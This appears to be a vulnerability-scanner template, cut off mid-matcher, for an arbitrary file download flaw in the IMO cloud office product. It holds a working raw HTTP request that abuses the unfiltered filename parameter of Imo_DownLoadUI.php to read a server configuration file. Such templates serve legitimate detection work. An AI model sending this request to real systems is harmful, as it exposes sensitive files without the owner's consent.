id: imo-file-download info: name: IMO - Arbitrary File Download author: ritikchaddha severity: high description: | The imo cloud office can read system sensitive files because the filename parameter of the /file/Placard/upload/Imo_DownLoadUI.php page is not strictly filtered. reference: - https://forum.butian.net/article/214 metadata: max-request: 2 tags: imo,file-download http: - raw: - | GET /file/Placard/upload/Imo_DownLoadUI.php?cid=1&uid=1&type=1&filename=/OpenPlatform/config/kdBind.php HTTP/1.1 Host: {{Hostname}} matchers-condition: and matchers: - type: word part: body words: - '